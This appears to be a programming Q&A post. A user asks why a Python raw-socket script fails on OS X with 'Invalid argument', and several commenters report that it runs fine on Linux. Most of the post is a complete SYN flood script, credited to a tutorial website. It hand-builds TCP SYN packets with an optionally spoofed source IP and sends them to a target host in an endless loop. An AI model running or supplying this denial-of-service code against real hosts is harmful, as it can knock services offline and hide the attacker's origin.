# Socket Error when using socket.sendto()

Tags: python, python-3.x, sockets, networking, python-3.5

So, I have a problem where when I use `s.sendto()`. Once I arrange all the information to be put into the packet and I try to send it, it ends up telling me there is something wrong with my arguments.

The code below is the code I'm using (admittedly from [this website](http://www.binarytides.com/python-syn-flood-program-raw-sockets-linux/)).

```
# some imports
import socket, sys
from struct import *

# checksum functions needed for calculation checksum
def checksum(msg):
    s = 0
    # loop taking 2 characters at a time
    for i in range(0, len(msg), 2):
        w = (ord(msg[i]) << 8) + (ord(msg[i+1]) )
        s = s + w

    s = (s>>16) + (s & 0xffff);
    #s = s + (s >> 16);
    #complement and mask to 4 byte short
    s = ~s & 0xffff

    return s

#create a raw socket
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
except socket.error , msg:
    print 'Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
    sys.exit()

# tell kernel not to put in headers, since we are providing it
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)

# now start constructing the packet
packet = '';

source_ip = '192.168.0.13'
dest_ip = '192.168.0.1' # or socket.gethostbyname('www.google.com')

# ip header fields
ihl = 5
version = 4
tos = 0
tot_len = 20 + 20   # python seems to correctly fill the total length, dont know how ??
id = 54321  #Id of this packet
frag_off = 0
ttl = 255
protocol = socket.IPPROTO_TCP
check = 10  # python seems to correctly fill the checksum
saddr = socket.inet_aton ( source_ip )  #Spoof the source ip address if you want to
daddr = socket.inet_aton ( dest_ip )

ihl_version = (version << 4) + ihl

# the ! in the pack format string means network order
ip_header = pack('!BBHHHBBH4s4s' , ihl_version, tos, tot_len, id, frag_off, ttl, protocol, check, saddr, daddr)

# tcp header fields
source = 1234   # source port
dest = 80   # destination port
seq = 0
ack_seq = 0
doff = 5    #4 bit field, size of tcp header, 5 * 4 = 20 bytes
#tcp flags
fin = 0
syn = 1
rst = 0
psh = 0
ack = 0
urg = 0
window = socket.htons (5840)    #   maximum allowed window size
check = 0
urg_ptr = 0

offset_res = (doff << 4) + 0
tcp_flags = fin + (syn << 1) + (rst << 2) + (psh <<3) + (ack << 4) + (urg << 5)

# the ! in the pack format string means network order
tcp_header = pack('!HHLLBBHHH' , source, dest, seq, ack_seq, offset_res, tcp_flags,  window, check, urg_ptr)

# pseudo header fields
source_address = socket.inet_aton( source_ip )
dest_address = socket.inet_aton(dest_ip)
placeholder = 0
protocol = socket.IPPROTO_TCP
tcp_length = len(tcp_header)

psh = pack('!4s4sBBH' , source_address , dest_address , placeholder , protocol , tcp_length);
psh = psh + tcp_header;

tcp_checksum = checksum(psh)

# make the tcp header again and fill the correct checksum
tcp_header = pack('!HHLLBBHHH' , source, dest, seq, ack_seq, offset_res, tcp_flags,  window, tcp_checksum , urg_ptr)

# final full packet - syn packets dont have any data
packet = ip_header + tcp_header

#Send the packet finally - the port specified has no effect
while True:
    s.sendto(packet, (dest_ip , 80))
```

And when I run it, I get this error:

```
File "tcp-syn.py", line 98, in <module>
    s.sendto(packet, (dest_ip , 80))     
socket.error: [Errno 22] Invalid argument
```

Any help would be appreciated!

Comment: save your code and code from link in two files and use some tools to comparing text files - ie. `diff`, `windiff`, [meld](http://meldmerge.org/). This way you can find differences.

Comment: your code works for me - Linux Mint.

Comment: @furas I'm running OS X. I'll try it with Kali Linux later

Comment: I'm not sure but some tools to work with sockets/packages need [pcap](https://en.wikipedia.org/wiki/Pcap) library.

Comment: Works fine on Ubuntu 14.04.